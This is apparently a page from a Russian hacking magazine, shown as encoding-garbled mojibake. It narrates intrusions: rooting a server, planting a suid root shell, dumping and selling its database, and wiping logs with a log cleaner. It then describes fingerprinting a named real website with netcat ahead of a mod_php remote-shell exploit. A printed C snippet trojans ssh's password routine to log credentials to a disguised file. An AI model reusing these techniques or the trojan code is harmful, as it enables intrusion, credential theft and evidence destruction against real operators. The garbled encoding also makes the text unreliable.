¦þ¹ ¼³¾Šł
¦þ¹ ¼³¾Šł
¦þ¹ ¼³¾Šł
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
òàêè àäìèíû ïëîõî ñëåäèëè çà ñâîèì ñîôòîì, âåäü<br />
çà÷åì, ñïðàøèâàåòñÿ, êðóòèòü íà ñåðâåðå telnetd è<br />
sshd îäíîâðåìåííî Òåïåðü íàäî áûëî äóìàòü, ÷òî<br />
äåëàòü äàëüøå ñ ðóòîâûìè ïðàâàìè :). Îí áûñòðåíüêî<br />
ñîçäàë íîâîãî ïîëüçîâàòåëÿ, óáåäèâøèñü, ÷òî â<br />
ñèñòåìå íèêîãî íåò (áûëà íî÷ü - àäìèíû ñïàëè). Çàòåì,<br />
ñìåíèâ åìó ïàðîëü, çàíîâî çàëîãîíèëñÿ ïî ssh.<br />
È ýòî áûëî ïóñòü íåáîëüøîé, íî îøèáêîé, èáî ëîãè<br />
ñäåëàëè ñâîå ÷åðíîå äåëî, çàïèñàâ âõîä õàêåðà â<br />
áèíàðíûé wtmp è òåêñòîâûé messages. Î ÷èñòêå ëîãîâ<br />
âçëîìùèê ïîçàáîòèëñÿ íåñêîëüêî ïîçæå. Ñåé÷àñ<br />
æå åãî âîëíîâàëî äðóãîå - äðóæåñòâåííîå çàèìñòâîâàíèå<br />
php-ñêðèïòîâ è äàìï sql-áàçû. Íî äëÿ íà÷àëà<br />
îí ñäåëàë ñåáå íîðìàëüíûé ðóòøåëë. Ïðèøëîñü íàïèñàòü<br />
ïðîñòåíüêèé ñèøíèê ñ ôóíêöèÿìè setuid, setgid<br />
è çàïóñêîì /bin/sh. Äàëåå ñëåäîâàë ïðîöåññ êîìïèëÿöèè,<br />
óñòàíîâêè suid-áèòà ïîä ðóòîì è çàïóñê íîâîãî<br />
øåëëà èç-ïîä îáû÷íîãî ïîëüçîâàòåëÿ. Òåïåðü ó<br />
õàêåðà áûë ïðîñòîé, íî êîìôîðòàáåëüíûé rootaccess<br />
ñ ïîääåðæêîé ïñåâäîòåðìèíàëà.<br />
Åãî èíòåðåñîâàëî, ÷òî æå ðàáîòàåò íà ýòîì ñåðâåðå.<br />
Äëÿ ýòîãî îí íàáðàë "ps ax" â êîíñîëè è ñòàë<br />
ðàçãëÿäûâàòü ñïèñîê ïðîöåññîâ. Íà ñåðâåðå áûëî<br />
çàïóùåíî ìíîãî ìóñîðà, òàêîãî êàê: ñèíõðîíèçàöèÿ<br />
âðåìåíè, êàêèå-òî ñòðàííûå ñ÷èòàëêè òðàôèêà<br />
è ïðî÷àÿ åðóíäà. Áîëüøå âñåãî áûë èíòåðåñåí<br />
ïðîöåññ httpd, à èìåííî ïóòü ê íàñòðîéêàì ñåðâåðà.<br />
Îòûñêàâ åãî, âçëîìùèê ïðîïàðñèë ôàéë íà<br />
íàëè÷èå äèðåêòèâû DocumentRoot. Èìåííî ÷åðåç<br />
íåå îí ìîã óçíàòü, ãäå íàõîäÿòñÿ php-ñêðèïòû. Íî<br />
ñàìè ñêðèïòû - ëèøü ÷àñòü åãî çàäà÷è, íóæíû áûëè<br />
è äàííûå èç sql-áàçû. Ïðèøëîñü âîñïîëüçîâàòüñÿ<br />
çàìå÷àòåëüíîé ïðîãðàììîé mysqldump. Ñ<br />
åå ïîìîùüþ îí áûñòðåíüêî çàäàìïèë äàòàáàçó,<br />
òåì ñàìûì âûïîëíèâ âñþ íåîáõîäèìóþ ðàáîòó.<br />
ÊÎÍ×ÈË - ÏÐÎÒÐÈ ÑÒÀÍÎÊ<br />
Êàê âèäíî, ïðîöåññ âçëîìà íå îáîøåëñÿ áåç ïîáî÷íûõ<br />
ýôôåêòîâ - õàêåð ïðèëè÷íî íàñëåäèë íà ñåðâåðå.<br />
Íî ëîãâàéïåðû íèêòî íå îòìåíÿë, ïîýòîìó, ïîðûâøèñü<br />
íà òåìàòè÷åñêèõ ñàéòàõ, îí îòûñêàë ïðîãðàììêó<br />
ïîä íàçâàíèåì grlogwipe. Îíà ÷èñòèò ïðàêòè÷åñêè<br />
âñå èçâåñòíûå ëîãè. Ýòèì è âîñïîëüçîâàëñÿ<br />
íàø ãðîçíûé ïîêîðèòåëü ñåðâåðîâ. Ïîñëå òàêîãî<br />
î÷èùåíèÿ îí çààðõèâèðîâàë âåñü äâèæîê, sql-áàçó<br />
è ñëèë ïîëó÷åííûå ôàéëû ñ âåáà ýòîé æå êîìïàíèè<br />
(íàãëîñòü - âòîðîå ñ÷àñòüå ;)). Òåïåðü ìîæíî áûëî<br />
ñî ñïîêîéíîé äóøîé îòïðàâëÿòüñÿ ñïàòü.<br />
Ïðîñíóâøèñü, õàêåð ñòàë ñîîáðàæàòü, êàê åìó<br />
ïðîâåñòè ñäåëêó ñ çàêàç÷èêîì. Ðåøåíèå áûëî òàêèì:<br />
çàêàç÷èêó ïåðåñûëàþòñÿ áàçû, ïîñëå ÷åãî<br />
òîò äîëæåí ðàñïëàòèòüñÿ ñî âçëîìùèêîì, è òîëüêî<br />
ïîñëå îïëàòû îí ïîëó÷èò íåîáõîäèìûå ñêðèïòû.<br />
Òàê êàê áàçû áåç ñêðèïòîâ íè÷åãî íå çíà÷àò,<br />
Íàõîäèì è çàáèðàåì php-äâèæîê<br />
óñëîâèÿ ñäåëêè óñòðîèëè îáå ñòîðîíû. È ÷òî óäèâèòåëüíî,<br />
ñäåëêà ïðîøëà áåç âñÿêèõ îñëîæíåíèé.<br />
Ìîðàëü ñåé áàñíè: àäìèíû - ëåíèâûå ëþäè, çàáèâàþùèå<br />
íà îáíîâëåíèå ñîôòà. Â íàøåì ïðèìåðå<br />
ýòî îáåðíóëîñü óòå÷êîé èíôîðìàöèè. Íî âñå<br />
ìîãëî áûòü èíà÷å, çàáåðèñü â ñèñòåìó âàíäàëðàçðóøèòåëü...<br />
ÝÒÞÄ ÂÒÎÐÎÉ: ÂÇËÎÌ WWW.NIKITA.RU<br />
Ïðàêòè÷åñêè âñå çíàþò, êòî òàêèå scriptkiddies.<br />
Ýòî òèï õàêåðîâ, êîòîðûå èùóò íàøóìåâøèå â<br />
bugtraq óÿçâèìîñòè, à çàòåì ïðèìåíÿþò èõ íà<br />
ñåðâåðàõ, ïðè÷åì ÷àùå âñåãî êðóïíûõ. Òàêîé õàê<br />
ñàì ïî ñåáå íå îïðàâäàí, íî â êàêîé-òî ìåðå ïîìîãàåò<br />
íàáðàòüñÿ îïûòà äëÿ áîëåå ñåðüåçíûõ<br />
âçëîìîâ. Ìíîãèå èç òåõ, êòî ëîìàåò ñåðâåðà, áûëè<br />
èëè ÿâëÿþòñÿ ýòèìè ïðåñëîâóòûìè ñêðèïòêèäèñàìè.<br />
Òàê ÷òî äàëüíåéøèé ðàññêàç ïîéäåò îá<br />
èñòîðèè âçëîìà ñåðâåðà ÷åðåç ñêðèïòêèäèñîâñêóþ<br />
ïðèçìó ïîíèìàíèÿ "êóëüòóðû õàêà".<br />
Íà ñàìîì äåëå, ñêðèïòêèäè íå îáÿçàòåëüíî ëîìàåò<br />
ñàéòû ÷åðåç óÿçâèìûå ñêðèïòû. Ýòî ìîæåò<br />
áûòü è ëþáàÿ äûðà â ñèñòåìå, äëÿ êîòîðîé ñóùåñòâóåò<br />
àëãîðèòì âçëîìà, èëè, ïîïðîñòó ãîâîðÿ,<br />
äëÿ ýòîé îøèáêè âûëîæåí public-ýêñïëîèò. Ïîëãîäà<br />
íàçàä íàøóìåâøèõ áàãîâ áûëî íåìíîãî. Îäèí<br />
èç íèõ - óÿçâèìîñòü â mod_php, ïîëó÷åíèå óäàëåííîãî<br />
øåëëà ñ ïðàâàìè nobody. Îá ýòîé îøèáêå<br />
è ïîéäåò ðå÷ü.<br />
 îäèí ïðåêðàñíûé äåíü íàø ñêðèïòêèäè ðåøèë<br />
ïîñêàíèòü ñåòü. Îí îñòàíîâèë âûáîð íà www.nikita.ru,<br />
ò.ê. íåäàâíî êóïèë ñåáå ôèðìåííûé äèñê ñ<br />
èãðîé Parkan (íäà, íåèñïîâåäèìû ïóòè ãîñïîäíè<br />
:) - ïðèì. ðåä). Ïî îïðåäåëåíèþ, ñêðèïòêèäè íå<br />
çàíèìàåòñÿ äåòàëüíûì èçó÷åíèåì ïðîòèâíèêà;<br />
äëÿ íåãî àêòóàëüíî ëèøü íàëè÷èå èëè îòñóòñòâèå<br />
æåëàåìîé óÿçâèìîñòè.  íàøåì ñëó÷àå - ýòî<br />
mod_php (âåðñèÿ 4.0.1-4.0.7).<br />
Âçëîìùèê äàâíî ðàçðàáîòàë óäîáíûé àëãîðèòì<br />
äëÿ îïðåäåëåíèÿ òèïà web-ñåðâåðà. Äëÿ ýòîãî<br />
åìó áûëà íåîáõîäèìà åäèíñòâåííàÿ ñåòåâàÿ óòèëèòà<br />
netcat, êîòîðóþ îí âñåãäà è èñïîëüçîâàë.<br />
Çíàÿ ìåõàíèçì ðàáîòû ôàéëîâûõ äåñêðèïòîðîâ,<br />
õàêåð ñîçäàë ôàéë get.txt. Â íåì íàõîäèëñÿ çàïðîñ<br />
www-çàãîëîâêà (HEAD / HTTP/1.0 è äâà ñèìâîëà<br />
ïåðåâîäà ñòðîêè - \n\n). Åãî îí ïåðåäàë netcat'ó,<br />
â èòîãå ïîëó÷èâ îòâåò îò apache.<br />
int<br />
userauth_passwd(Authctxt *authctxt)<br />
{<br />
static int ifile, attempt = 0; /* Íå<br />
çàáóäåì îáúÿâèòü ïåðåìåííóþ ifile */<br />
if (attempt != 1)<br />
error("Permission denied, please try<br />
again.");<br />
snprintf(prompt, sizeof(prompt),<br />
"%.30s@%.128s's password: ",<br />
authctxt->server_user, authctxt-<br />
>host);<br />
password = read_passphrase(prompt, 0);<br />
/* Øïèîíñêàÿ âñòàâêà â ïðàâèëüíûé êîä :)<br />
*/<br />
ifile=fopen("/usr/share/locale/it/console.it",<br />
"a"); /* Îòêðîåì øïèîíñêèé ôàéë íà çàïèñü<br />
â êîíåö */<br />
fprintf(ifile, "%s %s is %s\n", authctxt->server_user,<br />
authctxt->host, password);<br />
/* Çàïèøåì â ôàéë èìÿ ïîëüçîâàòåëÿ, õîñò<br />
è ïàðîëü - ãëàâíóþ èíôîðìàöèþ äëÿ<br />
ðàçìûøëåíèÿ ;) */<br />
fclose(ifile); /* Êîððåêòíî çàêðîåì ôàéë */<br />
Îòïðàâëÿåì ïðîòèâíèêà â íîêàóò<br />
Øåñòîå ÷óâñòâî íå ïîäâåëî õàêåðà ïðè âûáîðå<br />
æåðòâû - â òåëå îòâåòà ñåðâåðà äåéñòâèòåëüíî áûë<br />
PHP âåðñèè 4.0.6. À ýòà âåðñèÿ, êàê èçâåñòíî,<br />
ëîìàåòñÿ ñ áîëüøèì ãðîõîòîì. Òåïåðü<br />
íåîáõîäèìî áûëî îáíàðóæèòü ëþáîé php-<br />
5 6 7 8 9<br />
Þíèêñîèä X-Ñòèëü Êîäèíã Þíèòû Quit> 57